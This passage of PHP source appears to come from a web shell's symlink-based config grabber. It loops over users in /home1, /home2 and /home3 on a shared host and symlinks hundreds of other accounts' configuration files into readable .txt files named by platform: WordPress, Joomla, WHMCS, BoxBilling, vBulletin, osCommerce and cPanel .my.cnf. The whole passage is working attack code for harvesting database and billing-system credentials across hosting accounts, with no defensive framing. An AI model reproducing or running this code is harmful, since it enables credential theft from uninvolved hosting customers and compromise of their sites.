  1071. @symlink('/home1/'.$user.'/public_html/USER/configuration.php',$user.'-WHMCS.txt');
  1072. @symlink('/home1/'.$user.'/public_html/User/configuration.php',$user.'-WHMCS.txt');
  1073. @symlink('/home1/'.$user.'/public_html/user/configuration.php',$user.'-WHMCS.txt');
  1074. @symlink('/home1/'.$user.'/public_html/CLIENTS/configuration.php',$user.'-WHMCS.txt');
  1075. @symlink('/home1/'.$user.'/public_html/Clients/configuration.php',$user.'-WHMCS.txt');
  1076. @symlink('/home1/'.$user.'/public_html/clients/configuration.php',$user.'-WHMCS.txt');
  1077. @symlink('/home1/'.$user.'/public_html/BILLINGS/configuration.php',$user.'-WHMCS.txt');
  1078. @symlink('/home1/'.$user.'/public_html/Billings/configuration.php',$user.'-WHMCS.txt');
  1079. @symlink('/home1/'.$user.'/public_html/billings/configuration.php',$user.'-WHMCS.txt');
  1080. @symlink('/home1/'.$user.'/public_html/MY/configuration.php',$user.'-WHMCS.txt');
  1081. @symlink('/home1/'.$user.'/public_html/My/configuration.php',$user.'-WHMCS.txt');
  1082. @symlink('/home1/'.$user.'/public_html/my/configuration.php',$user.'-WHMCS.txt');
  1083. @symlink('/home1/'.$user.'/public_html/secure/whm/configuration.php',$user.'-WHMCS.txt');
  1084. @symlink('/home1/'.$user.'/public_html/secure/whmcs/configuration.php',$user.'-WHMCS.txt');
  1085. @symlink('/home1/'.$user.'/public_html/panel/configuration.php',$user.'-WHMCS.txt');
  1086. @symlink('/home1/'.$user.'/public_html/clientes/configuration.php',$user.'-WHMCS.txt');
  1087. @symlink('/home1/'.$user.'/public_html/cliente/configuration.php',$user.'-WHMCS.txt');
  1088. @symlink('/home1/'.$user.'/public_html/support/order/configuration.php',$user.'-WHMCS.txt');
  1089. @symlink('/home1/'.$user.'/public_html/bb-config.php',$user.'-BoxBilling.txt');
  1090. @symlink('/home1/'.$user.'/public_html/boxbilling/bb-config.php',$user.'-BoxBilling.txt');
  1091. @symlink('/home1/'.$user.'/public_html/box/bb-config.php',$user.'-BoxBilling.txt');
  1092. @symlink('/home1/'.$user.'/public_html/host/bb-config.php',$user.'-BoxBilling.txt');
  1093. @symlink('/home1/'.$user.'/public_html/Host/bb-config.php',$user.'-BoxBilling.txt');
  1094. @symlink('/home1/'.$user.'/public_html/supportes/bb-config.php',$user.'-BoxBilling.txt');
  1095. @symlink('/home1/'.$user.'/public_html/support/bb-config.php',$user.'-BoxBilling.txt');
  1096. @symlink('/home1/'.$user.'/public_html/hosting/bb-config.php',$user.'-BoxBilling.txt');
  1097. @symlink('/home1/'.$user.'/public_html/cart/bb-config.php',$user.'-BoxBilling.txt');
  1098. @symlink('/home1/'.$user.'/public_html/order/bb-config.php',$user.'-BoxBilling.txt');
  1099. @symlink('/home1/'.$user.'/public_html/client/bb-config.php',$user.'-BoxBilling.txt');
  1100. @symlink('/home1/'.$user.'/public_html/clients/bb-config.php',$user.'-BoxBilling.txt');
  1101. @symlink('/home1/'.$user.'/public_html/cliente/bb-config.php',$user.'-BoxBilling.txt');
  1102. @symlink('/home1/'.$user.'/public_html/clientes/bb-config.php',$user.'-BoxBilling.txt');
  1103. @symlink('/home1/'.$user.'/public_html/billing/bb-config.php',$user.'-BoxBilling.txt');
  1104. @symlink('/home1/'.$user.'/public_html/billings/bb-config.php',$user.'-BoxBilling.txt');
  1105. @symlink('/home1/'.$user.'/public_html/my/bb-config.php',$user.'-BoxBilling.txt');
  1106. @symlink('/home1/'.$user.'/public_html/secure/bb-config.php',$user.'-BoxBilling.txt');
  1107. @symlink('/home1/'.$user.'/public_html/support/order/bb-config.php',$user.'-BoxBilling.txt');
  1108. @symlink('/home1/'.$user.'/public_html/includes/dist-configure.php',$user.'-Zencart.txt');
  1109. @symlink('/home1/'.$user.'/public_html/zencart/includes/dist-configure.php',$user.'-Zencart.txt');
  1110. @symlink('/home1/'.$user.'/public_html/products/includes/dist-configure.php',$user.'-Zencart.txt');
  1111. @symlink('/home1/'.$user.'/public_html/cart/includes/dist-configure.php',$user.'-Zencart.txt');
  1112. @symlink('/home1/'.$user.'/public_html/shop/includes/dist-configure.php',$user.'-Zencart.txt');
  1113. @symlink('/home1/'.$user.'/public_html/includes/iso4217.php',$user.'-Hostbills.txt');
  1114. @symlink('/home1/'.$user.'/public_html/hostbills/includes/iso4217.php',$user.'-Hostbills.txt');
  1115. @symlink('/home1/'.$user.'/public_html/host/includes/iso4217.php',$user.'-Hostbills.txt');
  1116. @symlink('/home1/'.$user.'/public_html/Host/includes/iso4217.php',$user.'-Hostbills.txt');
  1117. @symlink('/home1/'.$user.'/public_html/supportes/includes/iso4217.php',$user.'-Hostbills.txt');
  1118. @symlink('/home1/'.$user.'/public_html/support/includes/iso4217.php',$user.'-Hostbills.txt');
  1119. @symlink('/home1/'.$user.'/public_html/hosting/includes/iso4217.php',$user.'-Hostbills.txt');
  1120. @symlink('/home1/'.$user.'/public_html/cart/includes/iso4217.php',$user.'-Hostbills.txt');
  1121. @symlink('/home1/'.$user.'/public_html/order/includes/iso4217.php',$user.'-Hostbills.txt');
  1122. @symlink('/home1/'.$user.'/public_html/client/includes/iso4217.php',$user.'-Hostbills.txt');
  1123. @symlink('/home1/'.$user.'/public_html/clients/includes/iso4217.php',$user.'-Hostbills.txt');
  1124. @symlink('/home1/'.$user.'/public_html/cliente/includes/iso4217.php',$user.'-Hostbills.txt');
  1125. @symlink('/home1/'.$user.'/public_html/clientes/includes/iso4217.php',$user.'-Hostbills.txt');
  1126. @symlink('/home1/'.$user.'/public_html/billing/includes/iso4217.php',$user.'-Hostbills.txt');
  1127. @symlink('/home1/'.$user.'/public_html/billings/includes/iso4217.php',$user.'-Hostbills.txt');
  1128. @symlink('/home1/'.$user.'/public_html/my/includes/iso4217.php',$user.'-Hostbills.txt');
  1129. @symlink('/home1/'.$user.'/public_html/secure/includes/iso4217.php',$user.'-Hostbills.txt');
  1130. @symlink('/home1/'.$user.'/public_html/support/order/includes/iso4217.php',$user.'-Hostbills.txt');
  1131. @symlink('/home1/'.$user.'/.my.cnf',$user.'-Cpanel.txt');
  1132. @symlink('/home1/'.$user.'/public_html/po-content/config.php',$user.'-Popoji.txt');
  1133. //Home2
  1134.  
  1135. @symlink('/home2/'.$user.'/public_html/vb/includes/config.php',$user.'-Vbulletin.txt');
  1136. @symlink('/home2/'.$user.'/public_html/includes/config.php',$user.'-Vbulletin.txt');
  1137. @symlink('/home2/'.$user.'/public_html/forum/includes/config.php',$user.'-Vbulletin.txt');
  1138. @symlink('/home2/'.$user.'/public_html/forums/includes/config.php',$user.'-Vbulletin.txt');
  1139. @symlink('/home2/'.$user.'/public_html/cc/includes/config.php',$user.'-Vbulletin.txt');
  1140. @symlink('/home2/'.$user.'/public_html/inc/config.php',$user.'-MyBB.txt');
  1141. @symlink('/home2/'.$user.'/public_html/includes/configure.php',$user.'-OsCommerce.txt');
  1142. @symlink('/home2/'.$user.'/public_html/shop/includes/configure.php',$user.'-OsCommerce.txt');
  1143. @symlink('/home2/'.$user.'/public_html/os/includes/configure.php',$user.'-OsCommerce.txt');
  1144. @symlink('/home2/'.$user.'/public_html/oscom/includes/configure.php',$user.'-OsCommerce.txt');
  1145. @symlink('/home2/'.$user.'/public_html/products/includes/configure.php',$user.'-OsCommerce.txt');
  1146. @symlink('/home2/'.$user.'/public_html/cart/includes/configure.php',$user.'-OsCommerce.txt');
  1147. @symlink('/home2/'.$user.'/public_html/inc/conf_global.php',$user.'-IPB.txt');
  1148. @symlink('/home2/'.$user.'/public_html/wp-config.php',$user.'-Wordpress.txt');
  1149. @symlink('/home2/'.$user.'/public_html/wp/test/wp-config.php',$user.'-Wordpress.txt');
  1150. @symlink('/home2/'.$user.'/public_html/blog/wp-config.php',$user.'-Wordpress.txt');
  1151. @symlink('/home2/'.$user.'/public_html/beta/wp-config.php',$user.'-Wordpress.txt');
  1152. @symlink('/home2/'.$user.'/public_html/portal/wp-config.php',$user.'-Wordpress.txt');
  1153. @symlink('/home2/'.$user.'/public_html/site/wp-config.php',$user.'-Wordpress.txt');
  1154. @symlink('/home2/'.$user.'/public_html/wp/wp-config.php',$user.'-Wordpress.txt');
  1155. @symlink('/home2/'.$user.'/public_html/WP/wp-config.php',$user.'-Wordpress.txt');
  1156. @symlink('/home2/'.$user.'/public_html/news/wp-config.php',$user.'-Wordpress.txt');
  1157. @symlink('/home2/'.$user.'/public_html/wordpress/wp-config.php',$user.'-Wordpress.txt');
  1158. @symlink('/home2/'.$user.'/public_html/test/wp-config.php',$user.'-Wordpress.txt');
  1159. @symlink('/home2/'.$user.'/public_html/demo/wp-config.php',$user.'-Wordpress.txt');
  1160. @symlink('/home2/'.$user.'/public_html/home/wp-config.php',$user.'-Wordpress.txt');
  1161. @symlink('/home2/'.$user.'/public_html/v1/wp-config.php',$user.'-Wordpress.txt');
  1162. @symlink('/home2/'.$user.'/public_html/v2/wp-config.php',$user.'-Wordpress.txt');
  1163. @symlink('/home2/'.$user.'/public_html/press/wp-config.php',$user.'-Wordpress.txt');
  1164. @symlink('/home2/'.$user.'/public_html/new/wp-config.php',$user.'-Wordpress.txt');
  1165. @symlink('/home2/'.$user.'/public_html/blogs/wp-config.php',$user.'-Wordpress.txt');
  1166. @symlink('/home2/'.$user.'/public_html/configuration.php',$user.'-Joomla.txt');
  1167. @symlink('/home2/'.$user.'/public_html/blog/configuration.php',$user.'-Joomla.txt');
  1168. @symlink('/home2/'.$user.'/public_html/submitticket.php',$user.'-^WHMCS.txt');
  1169. @symlink('/home2/'.$user.'/public_html/cms/configuration.php',$user.'-Joomla.txt');
  1170. @symlink('/home2/'.$user.'/public_html/beta/configuration.php',$user.'-Joomla.txt');
  1171. @symlink('/home2/'.$user.'/public_html/portal/configuration.php',$user.'-Joomla.txt');
  1172. @symlink('/home2/'.$user.'/public_html/site/configuration.php',$user.'-Joomla.txt');
  1173. @symlink('/home2/'.$user.'/public_html/main/configuration.php',$user.'-Joomla.txt');
  1174. @symlink('/home2/'.$user.'/public_html/home/configuration.php',$user.'-Joomla.txt');
  1175. @symlink('/home2/'.$user.'/public_html/demo/configuration.php',$user.'-Joomla.txt');
  1176. @symlink('/home2/'.$user.'/public_html/test/configuration.php',$user.'-Joomla.txt');
  1177. @symlink('/home2/'.$user.'/public_html/v1/configuration.php',$user.'-Joomla.txt');
  1178. @symlink('/home2/'.$user.'/public_html/v2/configuration.php',$user.'-Joomla.txt');
  1179. @symlink('/home2/'.$user.'/public_html/joomla/configuration.php',$user.'-Joomla.txt');
  1180. @symlink('/home2/'.$user.'/public_html/new/configuration.php',$user.'-Joomla.txt');
  1181. @symlink('/home2/'.$user.'/public_html/WHMCS/configuration.php',$user.'-WHMCS.txt');
  1182. @symlink('/home2/'.$user.'/public_html/whmcs1/configuration.php',$user.'-WHMCS.txt');
  1183. @symlink('/home2/'.$user.'/public_html/Whmcs/configuration.php',$user.'-WHMCS.txt');
  1184. @symlink('/home2/'.$user.'/public_html/whmcs/configuration.php',$user.'-WHMCS.txt');
  1185. @symlink('/home2/'.$user.'/public_html/whmcs/configuration.php',$user.'-WHMCS.txt');
  1186. @symlink('/home2/'.$user.'/public_html/WHMC/configuration.php',$user.'-WHMCS.txt');
  1187. @symlink('/home2/'.$user.'/public_html/Whmc/configuration.php',$user.'-WHMCS.txt');
  1188. @symlink('/home2/'.$user.'/public_html/whmc/configuration.php',$user.'-WHMCS.txt');
  1189. @symlink('/home2/'.$user.'/public_html/WHM/configuration.php',$user.'-WHMCS.txt');
  1190. @symlink('/home2/'.$user.'/public_html/Whm/configuration.php',$user.'-WHMCS.txt');
  1191. @symlink('/home2/'.$user.'/public_html/whm/configuration.php',$user.'-WHMCS.txt');
  1192. @symlink('/home2/'.$user.'/public_html/HOST/configuration.php',$user.'-WHMCS.txt');
  1193. @symlink('/home2/'.$user.'/public_html/Host/configuration.php',$user.'-WHMCS.txt');
  1194. @symlink('/home2/'.$user.'/public_html/host/configuration.php',$user.'-WHMCS.txt');
  1195. @symlink('/home2/'.$user.'/public_html/SUPPORTES/configuration.php',$user.'-WHMCS.txt');
  1196. @symlink('/home2/'.$user.'/public_html/Supportes/configuration.php',$user.'-WHMCS.txt');
  1197. @symlink('/home2/'.$user.'/public_html/supportes/configuration.php',$user.'-WHMCS.txt');
  1198. @symlink('/home2/'.$user.'/public_html/domains/configuration.php',$user.'-WHMCS.txt');
  1199. @symlink('/home2/'.$user.'/public_html/domain/configuration.php',$user.'-WHMCS.txt');
  1200. @symlink('/home2/'.$user.'/public_html/Hosting/configuration.php',$user.'-WHMCS.txt');
  1201. @symlink('/home2/'.$user.'/public_html/HOSTING/configuration.php',$user.'-WHMCS.txt');
  1202. @symlink('/home2/'.$user.'/public_html/hosting/configuration.php',$user.'-WHMCS.txt');
  1203. @symlink('/home2/'.$user.'/public_html/CART/configuration.php',$user.'-WHMCS.txt');
  1204. @symlink('/home2/'.$user.'/public_html/Cart/configuration.php',$user.'-WHMCS.txt');
  1205. @symlink('/home2/'.$user.'/public_html/cart/configuration.php',$user.'-WHMCS.txt');
  1206. @symlink('/home2/'.$user.'/public_html/ORDER/configuration.php',$user.'-WHMCS.txt');
  1207. @symlink('/home2/'.$user.'/public_html/Order/configuration.php',$user.'-WHMCS.txt');
  1208. @symlink('/home2/'.$user.'/public_html/order/configuration.php',$user.'-WHMCS.txt');
  1209. @symlink('/home2/'.$user.'/public_html/CLIENT/configuration.php',$user.'-WHMCS.txt');
  1210. @symlink('/home2/'.$user.'/public_html/Client/configuration.php',$user.'-WHMCS.txt');
  1211. @symlink('/home2/'.$user.'/public_html/client/configuration.php',$user.'-WHMCS.txt');
  1212. @symlink('/home2/'.$user.'/public_html/CLIENTAREA/configuration.php',$user.'-WHMCS.txt');
  1213. @symlink('/home2/'.$user.'/public_html/Clientarea/configuration.php',$user.'-WHMCS.txt');
  1214. @symlink('/home2/'.$user.'/public_html/clientarea/configuration.php',$user.'-WHMCS.txt');
  1215. @symlink('/home2/'.$user.'/public_html/SUPPORT/configuration.php',$user.'-WHMCS.txt');
  1216. @symlink('/home2/'.$user.'/public_html/Support/configuration.php',$user.'-WHMCS.txt');
  1217. @symlink('/home2/'.$user.'/public_html/support/configuration.php',$user.'-WHMCS.txt');
  1218. @symlink('/home2/'.$user.'/public_html/BILLING/configuration.php',$user.'-WHMCS.txt');
  1219. @symlink('/home2/'.$user.'/public_html/Billing/configuration.php',$user.'-WHMCS.txt');
  1220. @symlink('/home2/'.$user.'/public_html/billing/configuration.php',$user.'-WHMCS.txt');
  1221. @symlink('/home2/'.$user.'/public_html/BUY/configuration.php',$user.'-WHMCS.txt');
  1222. @symlink('/home2/'.$user.'/public_html/Buy/configuration.php',$user.'-WHMCS.txt');
  1223. @symlink('/home2/'.$user.'/public_html/buy/configuration.php',$user.'-WHMCS.txt');
  1224. @symlink('/home2/'.$user.'/public_html/MANAGE/configuration.php',$user.'-WHMCS.txt');
  1225. @symlink('/home2/'.$user.'/public_html/Manage/configuration.php',$user.'-WHMCS.txt');
  1226. @symlink('/home2/'.$user.'/public_html/manage/configuration.php',$user.'-WHMCS.txt');
  1227. @symlink('/home2/'.$user.'/public_html/CLIENTSUPPORT/configuration.php',$user.'-WHMCS.txt');
  1228. @symlink('/home2/'.$user.'/public_html/ClientSupport/configuration.php',$user.'-WHMCS.txt');
  1229. @symlink('/home2/'.$user.'/public_html/Clientsupport/configuration.php',$user.'-WHMCS.txt');
  1230. @symlink('/home2/'.$user.'/public_html/clientsupport/configuration.php',$user.'-WHMCS.txt');
  1231. @symlink('/home2/'.$user.'/public_html/CHECKOUT/configuration.php',$user.'-WHMCS.txt');
  1232. @symlink('/home2/'.$user.'/public_html/Checkout/configuration.php',$user.'-WHMCS.txt');
  1233. @symlink('/home2/'.$user.'/public_html/checkout/configuration.php',$user.'-WHMCS.txt');
  1234. @symlink('/home2/'.$user.'/public_html/BILLINGS/configuration.php',$user.'-WHMCS.txt');
  1235. @symlink('/home2/'.$user.'/public_html/Billings/configuration.php',$user.'-WHMCS.txt');
  1236. @symlink('/home2/'.$user.'/public_html/billings/configuration.php',$user.'-WHMCS.txt');
  1237. @symlink('/home2/'.$user.'/public_html/BASKET/configuration.php',$user.'-WHMCS.txt');
  1238. @symlink('/home2/'.$user.'/public_html/Basket/configuration.php',$user.'-WHMCS.txt');
  1239. @symlink('/home2/'.$user.'/public_html/basket/configuration.php',$user.'-WHMCS.txt');
  1240. @symlink('/home2/'.$user.'/public_html/SECURE/configuration.php',$user.'-WHMCS.txt');
  1241. @symlink('/home2/'.$user.'/public_html/Secure/configuration.php',$user.'-WHMCS.txt');
  1242. @symlink('/home2/'.$user.'/public_html/secure/configuration.php',$user.'-WHMCS.txt');
  1243. @symlink('/home2/'.$user.'/public_html/SALES/configuration.php',$user.'-WHMCS.txt');
  1244. @symlink('/home2/'.$user.'/public_html/Sales/configuration.php',$user.'-WHMCS.txt');
  1245. @symlink('/home2/'.$user.'/public_html/sales/configuration.php',$user.'-WHMCS.txt');
  1246. @symlink('/home2/'.$user.'/public_html/BILL/configuration.php',$user.'-WHMCS.txt');
  1247. @symlink('/home2/'.$user.'/public_html/Bill/configuration.php',$user.'-WHMCS.txt');
  1248. @symlink('/home2/'.$user.'/public_html/bill/configuration.php',$user.'-WHMCS.txt');
  1249. @symlink('/home2/'.$user.'/public_html/PURCHASE/configuration.php',$user.'-WHMCS.txt');
  1250. @symlink('/home2/'.$user.'/public_html/Purchase/configuration.php',$user.'-WHMCS.txt');
  1251. @symlink('/home2/'.$user.'/public_html/purchase/configuration.php',$user.'-WHMCS.txt');
  1252. @symlink('/home2/'.$user.'/public_html/ACCOUNT/configuration.php',$user.'-WHMCS.txt');
  1253. @symlink('/home2/'.$user.'/public_html/Account/configuration.php',$user.'-WHMCS.txt');
  1254. @symlink('/home2/'.$user.'/public_html/account/configuration.php',$user.'-WHMCS.txt');
  1255. @symlink('/home2/'.$user.'/public_html/USER/configuration.php',$user.'-WHMCS.txt');
  1256. @symlink('/home2/'.$user.'/public_html/User/configuration.php',$user.'-WHMCS.txt');
  1257. @symlink('/home2/'.$user.'/public_html/user/configuration.php',$user.'-WHMCS.txt');
  1258. @symlink('/home2/'.$user.'/public_html/CLIENTS/configuration.php',$user.'-WHMCS.txt');
  1259. @symlink('/home2/'.$user.'/public_html/Clients/configuration.php',$user.'-WHMCS.txt');
  1260. @symlink('/home2/'.$user.'/public_html/clients/configuration.php',$user.'-WHMCS.txt');
  1261. @symlink('/home2/'.$user.'/public_html/BILLINGS/configuration.php',$user.'-WHMCS.txt');
  1262. @symlink('/home2/'.$user.'/public_html/Billings/configuration.php',$user.'-WHMCS.txt');
  1263. @symlink('/home2/'.$user.'/public_html/billings/configuration.php',$user.'-WHMCS.txt');
  1264. @symlink('/home2/'.$user.'/public_html/MY/configuration.php',$user.'-WHMCS.txt');
  1265. @symlink('/home2/'.$user.'/public_html/My/configuration.php',$user.'-WHMCS.txt');
  1266. @symlink('/home2/'.$user.'/public_html/my/configuration.php',$user.'-WHMCS.txt');
  1267. @symlink('/home2/'.$user.'/public_html/secure/whm/configuration.php',$user.'-WHMCS.txt');
  1268. @symlink('/home2/'.$user.'/public_html/secure/whmcs/configuration.php',$user.'-WHMCS.txt');
  1269. @symlink('/home2/'.$user.'/public_html/panel/configuration.php',$user.'-WHMCS.txt');
  1270. @symlink('/home2/'.$user.'/public_html/clientes/configuration.php',$user.'-WHMCS.txt');
  1271. @symlink('/home2/'.$user.'/public_html/cliente/configuration.php',$user.'-WHMCS.txt');
  1272. @symlink('/home2/'.$user.'/public_html/support/order/configuration.php',$user.'-WHMCS.txt');
  1273. @symlink('/home2/'.$user.'/public_html/bb-config.php',$user.'-BoxBilling.txt');
  1274. @symlink('/home2/'.$user.'/public_html/boxbilling/bb-config.php',$user.'-BoxBilling.txt');
  1275. @symlink('/home2/'.$user.'/public_html/box/bb-config.php',$user.'-BoxBilling.txt');
  1276. @symlink('/home2/'.$user.'/public_html/host/bb-config.php',$user.'-BoxBilling.txt');
  1277. @symlink('/home2/'.$user.'/public_html/Host/bb-config.php',$user.'-BoxBilling.txt');
  1278. @symlink('/home2/'.$user.'/public_html/supportes/bb-config.php',$user.'-BoxBilling.txt');
  1279. @symlink('/home2/'.$user.'/public_html/support/bb-config.php',$user.'-BoxBilling.txt');
  1280. @symlink('/home2/'.$user.'/public_html/hosting/bb-config.php',$user.'-BoxBilling.txt');
  1281. @symlink('/home2/'.$user.'/public_html/cart/bb-config.php',$user.'-BoxBilling.txt');
  1282. @symlink('/home2/'.$user.'/public_html/order/bb-config.php',$user.'-BoxBilling.txt');
  1283. @symlink('/home2/'.$user.'/public_html/client/bb-config.php',$user.'-BoxBilling.txt');
  1284. @symlink('/home2/'.$user.'/public_html/clients/bb-config.php',$user.'-BoxBilling.txt');
  1285. @symlink('/home2/'.$user.'/public_html/cliente/bb-config.php',$user.'-BoxBilling.txt');
  1286. @symlink('/home2/'.$user.'/public_html/clientes/bb-config.php',$user.'-BoxBilling.txt');
  1287. @symlink('/home2/'.$user.'/public_html/billing/bb-config.php',$user.'-BoxBilling.txt');
  1288. @symlink('/home2/'.$user.'/public_html/billings/bb-config.php',$user.'-BoxBilling.txt');
  1289. @symlink('/home2/'.$user.'/public_html/my/bb-config.php',$user.'-BoxBilling.txt');
  1290. @symlink('/home2/'.$user.'/public_html/secure/bb-config.php',$user.'-BoxBilling.txt');
  1291. @symlink('/home2/'.$user.'/public_html/support/order/bb-config.php',$user.'-BoxBilling.txt');
  1292. @symlink('/home2/'.$user.'/public_html/includes/dist-configure.php',$user.'-Zencart.txt');
  1293. @symlink('/home2/'.$user.'/public_html/zencart/includes/dist-configure.php',$user.'-Zencart.txt');
  1294. @symlink('/home2/'.$user.'/public_html/products/includes/dist-configure.php',$user.'-Zencart.txt');
  1295. @symlink('/home2/'.$user.'/public_html/cart/includes/dist-configure.php',$user.'-Zencart.txt');
  1296. @symlink('/home2/'.$user.'/public_html/shop/includes/dist-configure.php',$user.'-Zencart.txt');
  1297. @symlink('/home2/'.$user.'/public_html/includes/iso4217.php',$user.'-Hostbills.txt');
  1298. @symlink('/home2/'.$user.'/public_html/hostbills/includes/iso4217.php',$user.'-Hostbills.txt');
  1299. @symlink('/home2/'.$user.'/public_html/host/includes/iso4217.php',$user.'-Hostbills.txt');
  1300. @symlink('/home2/'.$user.'/public_html/Host/includes/iso4217.php',$user.'-Hostbills.txt');
  1301. @symlink('/home2/'.$user.'/public_html/supportes/includes/iso4217.php',$user.'-Hostbills.txt');
  1302. @symlink('/home2/'.$user.'/public_html/support/includes/iso4217.php',$user.'-Hostbills.txt');
  1303. @symlink('/home2/'.$user.'/public_html/hosting/includes/iso4217.php',$user.'-Hostbills.txt');
  1304. @symlink('/home2/'.$user.'/public_html/cart/includes/iso4217.php',$user.'-Hostbills.txt');
  1305. @symlink('/home2/'.$user.'/public_html/order/includes/iso4217.php',$user.'-Hostbills.txt');
  1306. @symlink('/home2/'.$user.'/public_html/client/includes/iso4217.php',$user.'-Hostbills.txt');
  1307. @symlink('/home2/'.$user.'/public_html/clients/includes/iso4217.php',$user.'-Hostbills.txt');
  1308. @symlink('/home2/'.$user.'/public_html/cliente/includes/iso4217.php',$user.'-Hostbills.txt');
  1309. @symlink('/home2/'.$user.'/public_html/clientes/includes/iso4217.php',$user.'-Hostbills.txt');
  1310. @symlink('/home2/'.$user.'/public_html/billing/includes/iso4217.php',$user.'-Hostbills.txt');
  1311. @symlink('/home2/'.$user.'/public_html/billings/includes/iso4217.php',$user.'-Hostbills.txt');
  1312. @symlink('/home2/'.$user.'/public_html/my/includes/iso4217.php',$user.'-Hostbills.txt');
  1313. @symlink('/home2/'.$user.'/public_html/secure/includes/iso4217.php',$user.'-Hostbills.txt');
  1314. @symlink('/home2/'.$user.'/public_html/support/order/includes/iso4217.php',$user.'-Hostbills.txt');
  1315. @symlink('/home2/'.$user.'/.my.cnf',$user.'-Cpanel.txt');
  1316. @symlink('/home2/'.$user.'/public_html/po-content/config.php',$user.'-Popoji.txt');
  1317. //Home3
  1318.  
  1319. @symlink('/home3/'.$user.'/public_html/vb/includes/config.php',$user.'-Vbulletin.txt');
  1320. @symlink('/home3/'.$user.'/public_html/includes/config.php',$user.'-Vbulletin.txt');
  1321. @symlink('/home3/'.$user.'/public_html/forum/includes/config.php',$user.'-Vbulletin.txt');
  1322. @symlink('/home3/'.$user.'/public_html/forums/includes/config.php',$user.'-Vbulletin.txt');
  1323. @symlink('/home3/'.$user.'/public_html/cc/includes/config.php',$user.'-Vbulletin.txt');
  1324. @symlink('/home3/'.$user.'/public_html/inc/config.php',$user.'-MyBB.txt');
  1325. @symlink('/home3/'.$user.'/public_html/includes/configure.php',$user.'-OsCommerce.txt');
  1326. @symlink('/home3/'.$user.'/public_html/shop/includes/configure.php',$user.'-OsCommerce.txt');
  1327. @symlink('/home3/'.$user.'/public_html/os/includes/configure.php',$user.'-OsCommerce.txt');
  1328. @symlink('/home3/'.$user.'/public_html/oscom/includes/configure.php',$user.'-OsCommerce.txt');
  1329. @symlink('/home3/'.$user.'/public_html/products/includes/configure.php',$user.'-OsCommerce.txt');
  1330. @symlink('/home3/'.$user.'/public_html/cart/includes/configure.php',$user.'-OsCommerce.txt');
  1331. @symlink('/home3/'.$user.'/public_html/inc/conf_global.php',$user.'-IPB.txt');
  1332. @symlink('/home3/'.$user.'/public_html/wp-config.php',$user.'-Wordpress.txt');
  1333. @symlink('/home3/'.$user.'/public_html/wp/test/wp-config.php',$user.'-Wordpress.txt');
  1334. @symlink('/home3/'.$user.'/public_html/blog/wp-config.php',$user.'-Wordpress.txt');
  1335. @symlink('/home3/'.$user.'/public_html/beta/wp-config.php',$user.'-Wordpress.txt');
  1336. @symlink('/home3/'.$user.'/public_html/portal/wp-config.php',$user.'-Wordpress.txt');
  1337. @symlink('/home3/'.$user.'/public_html/site/wp-config.php',$user.'-Wordpress.txt');
  1338. @symlink('/home3/'.$user.'/public_html/wp/wp-config.php',$user.'-Wordpress.txt');
  1339. @symlink('/home3/'.$user.'/public_html/WP/wp-config.php',$user.'-Wordpress.txt');
  1340. @symlink('/home3/'.$user.'/public_html/news/wp-config.php',$user.'-Wordpress.txt');
  1341. @symlink('/home3/'.$user.'/public_html/wordpress/wp-config.php',$user.'-Wordpress.txt');
  1342. @symlink('/home3/'.$user.'/public_html/test/wp-config.php',$user.'-Wordpress.txt');
  1343. @symlink('/home3/'.$user.'/public_html/demo/wp-config.php',$user.'-Wordpress.txt');
  1344. @symlink('/home3/'.$user.'/public_html/home/wp-config.php',$user.'-Wordpress.txt');
  1345. @symlink('/home3/'.$user.'/public_html/v1/wp-config.php',$user.'-Wordpress.txt');
  1346. @symlink('/home3/'.$user.'/public_html/v2/wp-config.php',$user.'-Wordpress.txt');
  1347. @symlink('/home3/'.$user.'/public_html/press/wp-config.php',$user.'-Wordpress.txt');
  1348. @symlink('/home3/'.$user.'/public_html/new/wp-config.php',$user.'-Wordpress.txt');
  1349. @symlink('/home3/'.$user.'/public_html/blogs/wp-config.php',$user.'-Wordpress.txt');
  1350. @symlink('/home3/'.$user.'/public_html/configuration.php',$user.'-Joomla.txt');
  1351. @symlink('/home3/'.$user.'/public_html/blog/configuration.php',$user.'-Joomla.txt');
  1352. @symlink('/home3/'.$user.'/public_html/submitticket.php',$user.'-^WHMCS.txt');
  1353. @symlink('/home3/'.$user.'/public_html/cms/configuration.php',$user.'-Joomla.txt');
  1354. @symlink('/home3/'.$user.'/public_html/beta/configuration.php',$user.'-Joomla.txt');
  1355. @symlink('/home3/'.$user.'/public_html/portal/configuration.php',$user.'-Joomla.txt');
  1356. @symlink('/home3/'.$user.'/public_html/site/configuration.php',$user.'-Joomla.txt');
  1357. @symlink('/home3/'.$user.'/public_html/main/configuration.php',$user.'-Joomla.txt');
  1358. @symlink('/home3/'.$user.'/public_html/home/configuration.php',$user.'-Joomla.txt');
  1359. @symlink('/home3/'.$user.'/public_html/demo/configuration.php',$user.'-Joomla.txt');
  1360. @symlink('/home3/'.$user.'/public_html/test/configuration.php',$user.'-Joomla.txt');
  1361. @symlink('/home3/'.$user.'/public_html/v1/configuration.php',$user.'-Joomla.txt');
  1362. @symlink('/home3/'.$user.'/public_html/v2/configuration.php',$user.'-Joomla.txt');
  1363. @symlink('/home3/'.$user.'/public_html/joomla/configuration.php',$user.'-Joomla.txt');
  1364. @symlink('/home3/'.$user.'/public_html/new/configuration.php',$user.'-Joomla.txt');
  1365. @symlink('/home3/'.$user.'/public_html/WHMCS/configuration.php',$user.'-WHMCS.txt');
  1366. @symlink('/home3/'.$user.'/public_html/whmcs1/configuration.php',$user.'-WHMCS.txt');
  1367. @symlink('/home3/'.$user.'/public_html/Whmcs/configuration.php',$user.'-WHMCS.txt');
  1368. @symlink('/home3/'.$user.'/public_html/whmcs/configuration.php',$user.'-WHMCS.txt');
  1369. @symlink('/home3/'.$user.'/public_html/whmcs/configuration.php',$user.'-WHMCS.txt');
  1370. @symlink('/home3/'.$user.'/public_html/WHMC/configuration.php',$user.'-WHMCS.txt');
  1371. @symlink('/home3/'.$user.'/public_html/Whmc/configuration.php',$user.'-WHMCS.txt');
  1372. @symlink('/home3/'.$user.'/public_html/whmc/configuration.php',$user.'-WHMCS.txt');
  1373. @symlink('/home3/'.$user.'/public_html/WHM/configuration.php',$user.'-WHMCS.txt');
  1374. @symlink('/home3/'.$user.'/public_html/Whm/configuration.php',$user.'-WHMCS.txt');
  1375. @symlink('/home3/'.$user.'/public_html/whm/configuration.php',$user.'-WHMCS.txt');
  1376. @symlink('/home3/'.$user.'/public_html/HOST/configuration.php',$user.'-WHMCS.txt');
  1377. @symlink('/home3/'.$user.'/public_html/Host/configuration.php',$user.'-WHMCS.txt');
